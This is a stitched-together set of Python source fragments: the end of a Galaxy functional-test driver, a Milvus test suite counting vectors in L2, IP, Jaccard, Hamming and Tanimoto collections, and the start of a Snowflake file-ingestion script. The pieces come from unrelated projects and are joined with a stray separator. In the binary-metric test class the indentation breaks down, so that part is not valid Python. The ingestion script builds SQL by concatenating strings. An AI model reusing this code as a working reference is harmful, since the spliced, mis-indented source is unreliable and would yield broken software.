        """Stop running servers and relaunch them, optionally re-handling config."""
        self.stop_servers()
        self._register_and_run_servers(config_object, handle_config=handle_config)

    def _register_and_run_servers(self, config_object=None, handle_config=None):
        """Build (or reuse) a Galaxy config and launch the appropriate server."""
        config_object = self._ensure_config_object(config_object)
        self.app = None
        if self.external_galaxy is None:
            if self._saved_galaxy_config is not None:
                galaxy_config = self._saved_galaxy_config
            else:
                tempdir = tempfile.mkdtemp(dir=self.galaxy_test_tmp_dir)
                # Configure the database path.
                galaxy_db_path = database_files_path(tempdir)
                # Allow config object to specify a config dict or a method to produce
                # one - other just read the properties above and use the default
                # implementation from this file.
                galaxy_config = getattr(config_object, "galaxy_config", None)
                if callable(galaxy_config):
                    galaxy_config = galaxy_config()
                if galaxy_config is None:
                    setup_galaxy_config_kwds = dict(
                        allow_path_paste=getattr(config_object, "allow_path_paste", False),
                        use_test_file_dir=not self.testing_shed_tools,
                        default_install_db_merged=True,
                        default_tool_conf=self.default_tool_conf,
                        datatypes_conf=self.datatypes_conf_override,
                        prefer_template_database=getattr(config_object, "prefer_template_database", False),
                        log_format=self.log_format,
                        conda_auto_init=getattr(config_object, "conda_auto_init", False),
                        conda_auto_install=getattr(config_object, "conda_auto_install", False),
                        use_shared_connection_for_amqp=getattr(config_object, "use_shared_connection_for_amqp", False),
                        allow_tool_conf_override=self.allow_tool_conf_override,
                    )
                    galaxy_config = setup_galaxy_config(
                        galaxy_db_path,
                        **setup_galaxy_config_kwds
                    )
                    isolate_galaxy_config = getattr(config_object, "isolate_galaxy_config", False)
                    if isolate_galaxy_config:
                        galaxy_config["config_dir"] = tempdir
                self._saved_galaxy_config = galaxy_config
            if galaxy_config is not None:
                handle_galaxy_config_kwds = handle_config or getattr(
                    config_object, "handle_galaxy_config_kwds", None
                )
                if handle_galaxy_config_kwds is not None:
                    handle_galaxy_config_kwds(galaxy_config)
            if self.use_uwsgi:
                # NOTE(review): ``tempdir`` is only bound when a fresh config was
                # built above; restarting with a saved config and use_uwsgi would
                # raise NameError here - confirm intended restart semantics.
                server_wrapper = launch_uwsgi(
                    galaxy_config,
                    tempdir=tempdir,
                    config_object=config_object,
                )
            elif self.else_use_uvicorn:
                server_wrapper = launch_uvicorn(
                    lambda *args, **kwd: buildapp.app_factory(*args, wsgi_preflight=False, **kwd),
                    galaxy_config=galaxy_config,
                    config_object=config_object,
                )
                self.app = server_wrapper.app
            else:
                # ---- Build Application --------------------------------------------------
                self.app = build_galaxy_app(galaxy_config)
                server_wrapper = launch_server(
                    self.app,
                    buildapp.app_factory,
                    galaxy_config,
                    config_object=config_object,
                )
            # Fix: this branch launches a test-managed server (the external case
            # is handled below) - the two log messages were previously swapped.
            log.info(f"Functional tests will be run against test managed Galaxy server {server_wrapper.host}:{server_wrapper.port}")
            self.server_wrappers.append(server_wrapper)
        else:
            log.info(f"Functional tests will be run against external Galaxy server {self.external_galaxy}")
            # Ensure test file directory setup even though galaxy config isn't built.
            ensure_test_file_dir_set()

    def _ensure_config_object(self, config_object):
        """Default ``config_object`` to this driver instance when not supplied."""
        if config_object is None:
            config_object = self
        return config_object

    def setup_shed_tools(self, testing_migrated_tools=False, testing_installed_tools=True):
        """Configure shed tools for the running app for testing."""
        setup_shed_tools_for_test(
            self.app,
            self.galaxy_test_tmp_dir,
            testing_migrated_tools,
            testing_installed_tools
        )

    def build_tool_tests(self, testing_shed_tools=None, return_test_classes=False):
        """Build nose test classes for the tools in the app's toolbox."""
        if self.app is None:
            return
        if testing_shed_tools is None:
            testing_shed_tools = getattr(self, "testing_shed_tools", False)
        # We must make sure that functional.test_toolbox is always imported after
        # database_contexts.galaxy_content is set (which occurs in this method above).
        # If functional.test_toolbox is imported before database_contexts.galaxy_content
        # is set, sa_session will be None in all methods that use it.
        import functional.test_toolbox
        functional.test_toolbox.toolbox = self.app.toolbox
        # When testing data managers, do not test toolbox.
        test_classes = functional.test_toolbox.build_tests(
            app=self.app,
            testing_shed_tools=testing_shed_tools,
            master_api_key=get_admin_api_key(),
            user_api_key=get_user_api_key(),
        )
        if return_test_classes:
            return test_classes
        return functional.test_toolbox

    def run_tool_test(self, tool_id, index=0, resource_parameters=None, **kwd):
        """Run a single tool test against the managed server over the API."""
        if resource_parameters is None:
            resource_parameters = {}
        host, port, url = target_url_parts()
        galaxy_interactor_kwds = {
            "galaxy_url": url,
            "master_api_key": get_admin_api_key(),
            "api_key": get_user_api_key(),
            "keep_outputs_dir": None,
        }
        galaxy_interactor = GalaxyInteractorApi(**galaxy_interactor_kwds)
        verify_tool(
            tool_id=tool_id,
            test_index=index,
            galaxy_interactor=galaxy_interactor,
            resource_parameters=resource_parameters,
            **kwd
        )
def drive_test(test_driver_class):
    """Instantiate the given driver class, run it, and exit with its status."""
    exit_code = test_driver_class().run()
    sys.exit(exit_code)
# Explicit public API of this module (controls ``from ... import *``).
__all__ = (
    "copy_database_template",
    "build_logger",
    "drive_test",
    "FRAMEWORK_UPLOAD_TOOL_CONF",
    "FRAMEWORK_SAMPLE_TOOLS_CONF",
    "FRAMEWORK_DATATYPES_CONF",
    "database_conf",
    "get_webapp_global_conf",
    "nose_config_and_run",
    "setup_galaxy_config",
    "TestDriver",
    "wait_for_http_server",
)
# ---- test_collection_count.py ----
import pdb
import pytest
import logging
import itertools
from time import sleep
import threading
from multiprocessing import Process
from milvus import IndexType, MetricType
from utils import *
# Vector dimensionality used by every test in this module.
dim = 128
# ``index_file_size`` passed to create_collection.
index_file_size = 10
# Seconds to wait after add_vectors in the multiprocessing tests.
add_time_interval = 3
# Partition tag used by the partition-related tests.
tag = "1970-01-01"
# Default vector count (most tests override it locally).
nb = 6000
class TestCollectionCount:
    """
    params means different nb, the nb value may trigger merge, or not
    """
    # Parametrized insert sizes - the larger values may trigger segment merges.
    @pytest.fixture(
        scope="function",
        params=[
            1,
            5000,
            100000,
        ],
    )
    def add_vectors_nb(self, request):
        yield request.param

    """
    generate valid create_index params
    """
    @pytest.fixture(
        scope="function",
        params=gen_simple_index()
    )
    def get_simple_index(self, request, connect):
        if str(connect._cmd("mode")[1]) == "CPU":
            if request.param["index_type"] == IndexType.IVF_SQ8H:
                pytest.skip("sq8h not support in cpu mode")
        if request.param["index_type"] == IndexType.IVF_PQ:
            pytest.skip("Skip PQ Temporary")
        return request.param

    def test_collection_rows_count(self, connect, collection, add_vectors_nb):
        '''
        target: test collection rows_count is correct or not
        method: create collection and add vectors in it,
            assert the value returned by count_collection method is equal to length of vectors
        expected: the count is equal to the length of vectors
        '''
        nb = add_vectors_nb
        vectors = gen_vectors(nb, dim)
        res = connect.add_vectors(collection_name=collection, records=vectors)
        connect.flush([collection])
        status, res = connect.count_collection(collection)
        assert res == nb

    def test_collection_rows_count_partition(self, connect, collection, add_vectors_nb):
        '''
        target: test collection rows_count is correct or not
        method: create collection, create partition and add vectors in it,
            assert the value returned by count_collection method is equal to length of vectors
        expected: the count is equal to the length of vectors
        '''
        nb = add_vectors_nb
        vectors = gen_vectors(nb, dim)
        status = connect.create_partition(collection, tag)
        assert status.OK()
        res = connect.add_vectors(collection_name=collection, records=vectors, partition_tag=tag)
        connect.flush([collection])
        status, res = connect.count_collection(collection)
        assert res == nb

    def test_collection_rows_count_multi_partitions_A(self, connect, collection, add_vectors_nb):
        '''
        target: test collection rows_count is correct or not
        method: create collection, create partitions and add vectors in it,
            assert the value returned by count_collection method is equal to length of vectors
        expected: the count is equal to the length of vectors
        '''
        new_tag = "new_tag"
        nb = add_vectors_nb
        vectors = gen_vectors(nb, dim)
        # NOTE(review): only the second create_partition status is asserted;
        # the first status is overwritten before being checked.
        status = connect.create_partition(collection, tag)
        status = connect.create_partition(collection, new_tag)
        assert status.OK()
        res = connect.add_vectors(collection_name=collection, records=vectors)
        connect.flush([collection])
        status, res = connect.count_collection(collection)
        assert res == nb

    def test_collection_rows_count_multi_partitions_B(self, connect, collection, add_vectors_nb):
        '''
        target: test collection rows_count is correct or not
        method: create collection, create partitions and add vectors in one of the partitions,
            assert the value returned by count_collection method is equal to length of vectors
        expected: the count is equal to the length of vectors
        '''
        new_tag = "new_tag"
        nb = add_vectors_nb
        vectors = gen_vectors(nb, dim)
        status = connect.create_partition(collection, tag)
        status = connect.create_partition(collection, new_tag)
        assert status.OK()
        res = connect.add_vectors(collection_name=collection, records=vectors, partition_tag=tag)
        connect.flush([collection])
        status, res = connect.count_collection(collection)
        assert res == nb

    def test_collection_rows_count_multi_partitions_C(self, connect, collection, add_vectors_nb):
        '''
        target: test collection rows_count is correct or not
        method: create collection, create partitions and add vectors in one of the partitions,
            assert the value returned by count_collection method is equal to length of vectors
        expected: the collection count is equal to the length of vectors
        '''
        new_tag = "new_tag"
        nb = add_vectors_nb
        vectors = gen_vectors(nb, dim)
        status = connect.create_partition(collection, tag)
        status = connect.create_partition(collection, new_tag)
        assert status.OK()
        res = connect.add_vectors(collection_name=collection, records=vectors, partition_tag=tag)
        res = connect.add_vectors(collection_name=collection, records=vectors, partition_tag=new_tag)
        connect.flush([collection])
        status, res = connect.count_collection(collection)
        assert res == nb * 2

    def test_collection_rows_count_after_index_created(self, connect, collection, get_simple_index):
        '''
        target: test count_collection, after index have been created
        method: add vectors in db, and create index, then calling count_collection with correct params
        expected: count_collection raise exception
        '''
        index_param = get_simple_index["index_param"]
        index_type = get_simple_index["index_type"]
        nb = 100
        vectors = gen_vectors(nb, dim)
        res = connect.add_vectors(collection_name=collection, records=vectors)
        connect.flush([collection])
        connect.create_index(collection, index_type, index_param)
        status, res = connect.count_collection(collection)
        assert res == nb

    @pytest.mark.level(2)
    def test_count_without_connection(self, collection, dis_connect):
        '''
        target: test count_collection, without connection
        method: calling count_collection with correct params, with a disconnected instance
        expected: count_collection raise exception
        '''
        with pytest.raises(Exception) as e:
            status = dis_connect.count_collection(collection)

    def test_collection_rows_count_no_vectors(self, connect, collection):
        '''
        target: test collection rows_count is correct or not, if collection is empty
        method: create collection and no vectors in it,
            assert the value returned by count_collection method is equal to 0
        expected: the count is equal to 0
        '''
        collection_name = gen_unique_str()
        param = {'collection_name': collection_name,
                 'dimension': dim,
                 'index_file_size': index_file_size}
        connect.create_collection(param)
        # NOTE(review): a fresh collection is created above but the count below
        # targets the ``collection`` fixture - presumably also empty here;
        # confirm whether ``collection_name`` was intended instead.
        status, res = connect.count_collection(collection)
        assert res == 0

    # TODO: enable
    @pytest.mark.level(2)
    @pytest.mark.timeout(20)
    def _test_collection_rows_count_multiprocessing(self, connect, collection, args):
        '''
        target: test collection rows_count is correct or not with multiprocess
        method: create collection and add vectors in it,
            assert the value returned by count_collection method is equal to length of vectors
        expected: the count is equal to the length of vectors
        '''
        nq = 2
        uri = "tcp://%s:%s" % (args["ip"], args["port"])
        vectors = gen_vectors(nq, dim)
        res = connect.add_vectors(collection_name=collection, records=vectors)
        # Fix: only ``sleep`` is imported from ``time`` at module level, so the
        # previous ``time.sleep(...)`` raised NameError when this test ran.
        sleep(add_time_interval)

        def rows_count(milvus):
            status, res = milvus.count_collection(collection)
            logging.getLogger().info(status)
            assert res == nq

        process_num = 8
        processes = []
        for i in range(process_num):
            milvus = get_milvus(args["handler"])
            milvus.connect(uri=uri)
            p = Process(target=rows_count, args=(milvus, ))
            processes.append(p)
            p.start()
            logging.getLogger().info(p)
        for p in processes:
            p.join()

    def test_collection_rows_count_multi_collections(self, connect):
        '''
        target: test collection rows_count is correct or not with multiple collections of L2
        method: create collection and add vectors in it,
            assert the value returned by count_collection method is equal to length of vectors
        expected: the count is equal to the length of vectors
        '''
        nq = 100
        vectors = gen_vectors(nq, dim)
        collection_list = []
        for i in range(20):
            collection_name = gen_unique_str()
            collection_list.append(collection_name)
            param = {'collection_name': collection_name,
                     'dimension': dim,
                     'index_file_size': index_file_size,
                     'metric_type': MetricType.L2}
            connect.create_collection(param)
            res = connect.add_vectors(collection_name=collection_name, records=vectors)
        connect.flush(collection_list)
        for i in range(20):
            status, res = connect.count_collection(collection_list[i])
            assert status.OK()
            assert res == nq
class TestCollectionCountIP:
    """
    params means different nb, the nb value may trigger merge, or not
    """
    # Parametrized insert sizes - the larger values may trigger segment merges.
    @pytest.fixture(
        scope="function",
        params=[
            1,
            5000,
            100000,
        ],
    )
    def add_vectors_nb(self, request):
        yield request.param

    """
    generate valid create_index params
    """
    @pytest.fixture(
        scope="function",
        params=gen_simple_index()
    )
    def get_simple_index(self, request, connect):
        if str(connect._cmd("mode")[1]) == "CPU":
            if request.param["index_type"] == IndexType.IVF_SQ8H:
                pytest.skip("sq8h not support in CPU mode")
        if request.param["index_type"] == IndexType.IVF_PQ:
            pytest.skip("Skip PQ Temporary")
        return request.param

    def test_collection_rows_count(self, connect, ip_collection, add_vectors_nb):
        '''
        target: test collection rows_count is correct or not
        method: create collection and add vectors in it,
            assert the value returned by count_collection method is equal to length of vectors
        expected: the count is equal to the length of vectors
        '''
        nb = add_vectors_nb
        vectors = gen_vectors(nb, dim)
        res = connect.add_vectors(collection_name=ip_collection, records=vectors)
        connect.flush([ip_collection])
        status, res = connect.count_collection(ip_collection)
        assert res == nb

    def test_collection_rows_count_after_index_created(self, connect, ip_collection, get_simple_index):
        '''
        target: test count_collection, after index have been created
        method: add vectors in db, and create index, then calling count_collection with correct params
        expected: count_collection raise exception
        '''
        index_param = get_simple_index["index_param"]
        index_type = get_simple_index["index_type"]
        nb = 100
        vectors = gen_vectors(nb, dim)
        res = connect.add_vectors(collection_name=ip_collection, records=vectors)
        connect.flush([ip_collection])
        connect.create_index(ip_collection, index_type, index_param)
        status, res = connect.count_collection(ip_collection)
        assert res == nb

    @pytest.mark.level(2)
    def test_count_without_connection(self, ip_collection, dis_connect):
        '''
        target: test count_collection, without connection
        method: calling count_collection with correct params, with a disconnected instance
        expected: count_collection raise exception
        '''
        with pytest.raises(Exception) as e:
            status = dis_connect.count_collection(ip_collection)

    def test_collection_rows_count_no_vectors(self, connect, ip_collection):
        '''
        target: test collection rows_count is correct or not, if collection is empty
        method: create collection and no vectors in it,
            assert the value returned by count_collection method is equal to 0
        expected: the count is equal to 0
        '''
        collection_name = gen_unique_str("test_collection")
        param = {'collection_name': collection_name,
                 'dimension': dim,
                 'index_file_size': index_file_size}
        connect.create_collection(param)
        # NOTE(review): the count targets the ``ip_collection`` fixture, not the
        # collection created just above - presumably both are empty; confirm intent.
        status, res = connect.count_collection(ip_collection)
        assert res == 0

    # TODO: enable
    @pytest.mark.timeout(60)
    def _test_collection_rows_count_multiprocessing(self, connect, ip_collection, args):
        '''
        target: test collection rows_count is correct or not with multiprocess
        method: create collection and add vectors in it,
            assert the value returned by count_collection method is equal to length of vectors
        expected: the count is equal to the length of vectors
        '''
        nq = 2
        uri = "tcp://%s:%s" % (args["ip"], args["port"])
        vectors = gen_vectors(nq, dim)
        res = connect.add_vectors(collection_name=ip_collection, records=vectors)
        # Fix: only ``sleep`` is imported from ``time`` at module level, so the
        # previous ``time.sleep(...)`` raised NameError when this test ran.
        sleep(add_time_interval)

        def rows_count(milvus):
            status, res = milvus.count_collection(ip_collection)
            logging.getLogger().info(status)
            assert res == nq

        process_num = 8
        processes = []
        for i in range(process_num):
            milvus = get_milvus(args["handler"])
            milvus.connect(uri=uri)
            p = Process(target=rows_count, args=(milvus,))
            processes.append(p)
            p.start()
            logging.getLogger().info(p)
        for p in processes:
            p.join()

    def test_collection_rows_count_multi_collections(self, connect):
        '''
        target: test collection rows_count is correct or not with multiple collections of IP
        method: create collection and add vectors in it,
            assert the value returned by count_collection method is equal to length of vectors
        expected: the count is equal to the length of vectors
        '''
        nq = 100
        vectors = gen_vectors(nq, dim)
        collection_list = []
        for i in range(20):
            collection_name = gen_unique_str('test_collection_rows_count_multi_collections')
            collection_list.append(collection_name)
            param = {'collection_name': collection_name,
                     'dimension': dim,
                     'index_file_size': index_file_size,
                     'metric_type': MetricType.IP}
            connect.create_collection(param)
            res = connect.add_vectors(collection_name=collection_name, records=vectors)
        connect.flush(collection_list)
        for i in range(20):
            status, res = connect.count_collection(collection_list[i])
            assert status.OK()
            assert res == nq
class TestCollectionCountJAC:
    """
    params means different nb, the nb value may trigger merge, or not
    """
    # Parametrized insert sizes - the larger values may trigger segment merges.
    @pytest.fixture(
        scope="function",
        params=[
            1,
            5000,
            100000,
        ],
    )
    def add_vectors_nb(self, request):
        yield request.param

    """
    generate valid create_index params
    """
    @pytest.fixture(
        scope="function",
        params=gen_simple_index()
    )
    def get_jaccard_index(self, request, connect):
        # Only FLAT/IVFLAT index types are exercised for the Jaccard metric here.
        logging.getLogger().info(request.param)
        if request.param["index_type"] == IndexType.IVFLAT or request.param["index_type"] == IndexType.FLAT:
            return request.param
        else:
            pytest.skip("Skip index Temporary")

    def test_collection_rows_count(self, connect, jac_collection, add_vectors_nb):
        '''
        target: test collection rows_count is correct or not
        method: create collection and add vectors in it,
            assert the value returned by count_collection method is equal to length of vectors
        expected: the count is equal to the length of vectors
        '''
        nb = add_vectors_nb
        tmp, vectors = gen_binary_vectors(nb, dim)
        res = connect.add_vectors(collection_name=jac_collection, records=vectors)
        connect.flush([jac_collection])
        status, res = connect.count_collection(jac_collection)
        assert res == nb

    def test_collection_rows_count_after_index_created(self, connect, jac_collection, get_jaccard_index):
        '''
        target: test count_collection, after index have been created
        method: add vectors in db, and create index, then calling count_collection with correct params
        expected: count_collection raise exception
        '''
        nb = 100
        index_param = get_jaccard_index["index_param"]
        index_type = get_jaccard_index["index_type"]
        tmp, vectors = gen_binary_vectors(nb, dim)
        res = connect.add_vectors(collection_name=jac_collection, records=vectors)
        connect.flush([jac_collection])
        connect.create_index(jac_collection, index_type, index_param)
        status, res = connect.count_collection(jac_collection)
        assert res == nb

    @pytest.mark.level(2)
    def test_count_without_connection(self, jac_collection, dis_connect):
        '''
        target: test count_collection, without connection
        method: calling count_collection with correct params, with a disconnected instance
        expected: count_collection raise exception
        '''
        with pytest.raises(Exception) as e:
            status = dis_connect.count_collection(jac_collection)

    def test_collection_rows_count_no_vectors(self, connect, jac_collection):
        '''
        target: test collection rows_count is correct or not, if collection is empty
        method: create collection and no vectors in it,
            assert the value returned by count_collection method is equal to 0
        expected: the count is equal to 0
        '''
        collection_name = gen_unique_str("test_collection")
        param = {'collection_name': collection_name,
                 'dimension': dim,
                 'index_file_size': index_file_size}
        connect.create_collection(param)
        # NOTE(review): the count targets the ``jac_collection`` fixture, not the
        # collection created just above - presumably both are empty; confirm intent.
        status, res = connect.count_collection(jac_collection)
        assert res == 0

    def test_collection_rows_count_multi_collections(self, connect):
        '''
        target: test collection rows_count is correct or not with multiple collections of IP
        method: create collection and add vectors in it,
            assert the value returned by count_collection method is equal to length of vectors
        expected: the count is equal to the length of vectors
        '''
        nq = 100
        tmp, vectors = gen_binary_vectors(nq, dim)
        collection_list = []
        for i in range(20):
            collection_name = gen_unique_str('test_collection_rows_count_multi_collections')
            collection_list.append(collection_name)
            param = {'collection_name': collection_name,
                     'dimension': dim,
                     'index_file_size': index_file_size,
                     'metric_type': MetricType.JACCARD}
            connect.create_collection(param)
            res = connect.add_vectors(collection_name=collection_name, records=vectors)
        connect.flush(collection_list)
        for i in range(20):
            status, res = connect.count_collection(collection_list[i])
            assert status.OK()
            assert res == nq
class TestCollectionCountBinary:
"""
params means different nb, the nb value may trigger merge, or not
"""
    # Parametrized insert sizes - the larger values may trigger segment merges.
    @pytest.fixture(
        scope="function",
        params=[
            1,
            5000,
            100000,
        ],
    )
    def add_vectors_nb(self, request):
        yield request.param
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_hamming_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == IndexType.IVFLAT or request.param["index_type"] == IndexType.FLAT:
return request.param
else:
pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_substructure_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == IndexType.FLAT:
return request.param
else:
pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_superstructure_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == IndexType.FLAT:
return request.param
else:
pytest.skip("Skip index Temporary")
def test_collection_rows_count(self, connect, ham_collection, add_vectors_nb):
'''
target: test collection rows_count is correct or not
method: create collection and add vectors in it,
assert the value returned by count_collection method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nb = add_vectors_nb
tmp, vectors = gen_binary_vectors(nb, dim)
res = connect.add_vectors(collection_name=ham_collection, records=vectors)
connect.flush([ham_collection])
status, res = connect.count_collection(ham_collection)
assert res == nb
def test_collection_rows_count_substructure(self, connect, substructure_collection, add_vectors_nb):
'''
target: test collection rows_count is correct or not
method: create collection and add vectors in it,
assert the value returned by count_collection method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nb = add_vectors_nb
tmp, vectors = gen_binary_vectors(nb, dim)
res = connect.add_vectors(collection_name=substructure_collection, records=vectors)
connect.flush([substructure_collection])
status, res = connect.count_collection(substructure_collection)
assert res == nb
def test_collection_rows_count_superstructure(self, connect, superstructure_collection, add_vectors_nb):
'''
target: test collection rows_count is correct or not
method: create collection and add vectors in it,
assert the value returned by count_collection method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nb = add_vectors_nb
tmp, vectors = gen_binary_vectors(nb, dim)
res = connect.add_vectors(collection_name=superstructure_collection, records=vectors)
connect.flush([superstructure_collection])
status, res = connect.count_collection(superstructure_collection)
assert res == nb
def test_collection_rows_count_after_index_created(self, connect, ham_collection, get_hamming_index):
'''
target: test count_collection, after index have been created
method: add vectors in db, and create index, then calling count_collection with correct params
expected: count_collection raise exception
'''
nb = 100
index_type = get_hamming_index["index_type"]
index_param = get_hamming_index["index_param"]
tmp, vectors = gen_binary_vectors(nb, dim)
res = connect.add_vectors(collection_name=ham_collection, records=vectors)
connect.flush([ham_collection])
connect.create_index(ham_collection, index_type, index_param)
status, res = connect.count_collection(ham_collection)
assert res == nb
def test_collection_rows_count_after_index_created_substructure(self, connect, substructure_collection, get_substructure_index):
'''
target: test count_collection, after index have been created
method: add vectors in db, and create index, then calling count_collection with correct params
expected: count_collection raise exception
'''
nb = 100
index_type = get_substructure_index["index_type"]
index_param = get_substructure_index["index_param"]
tmp, vectors = gen_binary_vectors(nb, dim)
res = connect.add_vectors(collection_name=substructure_collection, records=vectors)
connect.flush([substructure_collection])
connect.create_index(substructure_collection, index_type, index_param)
status, res = connect.count_collection(substructure_collection)
assert res == nb
def test_collection_rows_count_after_index_created_superstructure(self, connect, superstructure_collection, get_superstructure_index):
    '''
    target: test count_collection, after index have been created
    method: add vectors in db, and create index, then calling count_collection with correct params
    expected: count_collection succeeds and returns the number of inserted vectors
    '''
    # FIX: docstring previously said "raise exception" although the test
    # asserts a successful count.
    nb = 100
    index_type = get_superstructure_index["index_type"]
    index_param = get_superstructure_index["index_param"]
    tmp, vectors = gen_binary_vectors(nb, dim)
    res = connect.add_vectors(collection_name=superstructure_collection, records=vectors)
    # persist the inserted vectors before building the index
    connect.flush([superstructure_collection])
    connect.create_index(superstructure_collection, index_type, index_param)
    status, res = connect.count_collection(superstructure_collection)
    # check the call succeeded, consistent with the other count tests in this suite
    assert status.OK()
    assert res == nb
@pytest.mark.level(2)
def test_count_without_connection(self, ham_collection, dis_connect):
    '''
    target: test count_collection, without connection
    method: calling count_collection with correct params, with a disconnected instance
    expected: count_collection raise exception
    '''
    # a disconnected client must not be able to count rows
    with pytest.raises(Exception):
        dis_connect.count_collection(ham_collection)
def test_collection_rows_count_no_vectors(self, connect, ham_collection):
    '''
    target: test collection rows_count is correct or not, if collection is empty
    method: create collection and no vectors in it,
        assert the value returned by count_collection method is equal to 0
    expected: the count is equal to 0
    '''
    collection_name = gen_unique_str("test_collection")
    param = {'collection_name': collection_name,
             'dimension': dim,
             'index_file_size': index_file_size}
    connect.create_collection(param)
    # BUG FIX: count the freshly created (empty) collection -- the original
    # counted the ham_collection fixture and left the created collection
    # entirely unused, so the scenario in the docstring was never exercised.
    status, res = connect.count_collection(collection_name)
    assert status.OK()
    assert res == 0
def test_collection_rows_count_multi_collections(self, connect):
    '''
    target: test collection rows_count is correct or not with multiple collections of IP
    method: create collection and add vectors in it,
        assert the value returned by count_collection method is equal to length of vectors
    expected: the count is equal to the length of vectors
    '''
    nq = 100
    _, vectors = gen_binary_vectors(nq, dim)
    collection_list = []
    # spread the same vectors over 20 freshly created HAMMING collections
    for _ in range(20):
        name = gen_unique_str('test_collection_rows_count_multi_collections')
        collection_list.append(name)
        connect.create_collection({'collection_name': name,
                                   'dimension': dim,
                                   'index_file_size': index_file_size,
                                   'metric_type': MetricType.HAMMING})
        connect.add_vectors(collection_name=name, records=vectors)
    # single flush covering every collection at once
    connect.flush(collection_list)
    for name in collection_list:
        status, row_count = connect.count_collection(name)
        assert status.OK()
        assert row_count == nq
class TestCollectionCountTANIMOTO:
    """
    params means different nb, the nb value may trigger merge, or not
    """
    # nb values spanning tiny / medium / large inserts; the bigger sizes are
    # presumably meant to cross an internal merge threshold -- TODO confirm
    @pytest.fixture(
        scope="function",
        params=[
            1,
            5000,
            100000,
        ],
    )
    def add_vectors_nb(self, request):
        yield request.param
    """
    generate valid create_index params
    """
    @pytest.fixture(
        scope="function",
        params=gen_simple_index()
    )
    def get_tanimoto_index(self, request, connect):
        logging.getLogger().info(request.param)
        # only FLAT / IVFLAT index params are returned; every other index type
        # is skipped for this metric
        if request.param["index_type"] == IndexType.IVFLAT or request.param["index_type"] == IndexType.FLAT:
            return request.param
        else:
            pytest.skip("Skip index Temporary")
    def test_collection_rows_count(self, connect, tanimoto_collection, add_vectors_nb):
        '''
        target: test collection rows_count is correct or not
        method: create collection and add vectors in it,
            assert the value returned by count_collection method is equal to length of vectors
        expected: the count is equal to the length of vectors
        '''
        nb = add_vectors_nb
        tmp, vectors = gen_binary_vectors(nb, dim)
        res = connect.add_vectors(collection_name=tanimoto_collection, records=vectors)
        connect.flush([tanimoto_collection])
        status, res = connect.count_collection(tanimoto_collection)
        assert status.OK()
        assert res == nb
|
main.py | from time import sleep
import ingestion
import snowflake.connector
import os
import json
from ddlgenerator.ddlgenerator import Table
import re
import multiprocessing
environmentVariables='config/envVar.json'
ev={"controlTable":"","cur":""}
def executeMultiQuery(queries):
    """Execute each SQL statement in *queries* on the shared cursor.

    Prints every statement's full result set and returns the result of a
    final fetchone() after the last statement.
    """
    cursor = ev["cur"]
    for statement in queries:
        cursor.execute(statement)
        print(cursor.fetchall())
    return cursor.fetchone()
def get_ddl(fileSourceLocation,fileName,targetDb,targetSchema,targetTable):
    """Infer a CREATE-TABLE statement for the file via ddlgenerator and
    rewrite it as CREATE OR REPLACE TABLE in the target db/schema."""
    source_path = str(fileSourceLocation) + "/" + str(fileName)
    table = Table(source_path, table_name=targetTable)
    statement = table.ddl('mysql')
    qualified = "CREATE OR REPLACE TABLE " + str(targetDb) + "." + str(targetSchema) + "."
    statement = statement.replace("CREATE TABLE ", qualified).replace(";", "")
    # blank the first three '.*' matches -- presumably clears the leading
    # DROP TABLE lines ddlgenerator emits; TODO confirm against its output
    statement = re.sub('.*', '', statement, 3)
    # strip tab runs and leading underscores from generated column names
    statement = re.sub(r"\t+_*", '', statement)
    print(statement)
    return(str(statement))
def FullDirectFile(jobVariables):
    """Load one source file straight into its Snowflake target table.

    *jobVariables* is a control-table row (dict of job settings). Depending
    on the flags it (re)creates the target table OR truncates it, and for a
    'Local' source it PUTs the file to the stage and COPYs it into the table.
    All statements are collected in order and run via executeMultiQuery.
    """
    fileSourceType = jobVariables['FILE_SRC_TYPE']
    fileSourceLocation = jobVariables['SRC_LOC']
    fileName = jobVariables['SRC_TBL_NAME']
    stageName = jobVariables['STAGE']
    targetTable = str(jobVariables['TGT_TBL'])
    targetSchema = jobVariables['TGT_SCHEMA']
    targetDb = jobVariables['TGT_DB']
    fileFormat = jobVariables['FILE_FORMAT']
    fileOptions = jobVariables['FILE_OPTIONS']
    truncateFlag= jobVariables['TARGET_TRUNCATE_FLAG']
    recreateDdl=jobVariables['RECREATE_DDL']
    fileFormatDb=jobVariables['FILE_FORMAT_DB']
    fileFormatSchema=jobVariables['FILE_FORMAT_SCHEMA']
    # menu = Table(str(fileSourceLocation)+"/"+str(fileName),table_name=targetTable)
    # ddl = menu.ddl('mysql')
    # ddl = ddl.replace("CREATE TABLE ", "CREATE TABLE IF NOT EXISTS "+str(targetDb)+"."+str(targetSchema)+".")
    # ddl = ddl.replace(";","")
    # # ddl = ddl.replace("DROP TABLE "+str(fileName),"")
    # ddl=re.sub('.*', '', ddl, 3)
    # # print(re.sub('^DROP TABLE .*$', '', ddl))
    queries=[]
    # NOTE(review): recreate and truncate are mutually exclusive here --
    # when RECREATE_DDL=='Y' the truncate flag is ignored; confirm intended.
    if(recreateDdl=='Y'):
        ddl= get_ddl(fileSourceLocation,fileName,targetDb,targetSchema,targetTable)
        queries.append(ddl)
    elif(truncateFlag=='Y'):
        truncateQuery="TRUNCATE TABLE "+targetDb+"."+targetSchema+"."+targetTable
        queries.append(truncateQuery)
    if(fileSourceType=='Local'):
        # PUT compresses to <fileName>.gz on the stage, hence the '.gz' in COPY
        putCommand="PUT 'file://"+str(fileSourceLocation)+"/"+str(fileName)+"' @"+stageName
        copyCommand="COPY INTO "+targetDb+"."+targetSchema+"."+targetTable+" FROM '@"+stageName+"/"+fileName+".gz' FILE_FORMAT="+fileFormatDb+"."+fileFormatSchema+"."+fileFormat+" "+fileOptions
        queries.append(putCommand)
        queries.append(copyCommand)
    print(queries)
    executeMultiQuery(queries)
def readControlTable(CONTROL_TABLE,batch):
    """Read the CSV control table and return the active job rows for *batch*.

    Args:
        CONTROL_TABLE: path of the control-table CSV file.
        batch: value of the BATCH_NAME column to select.

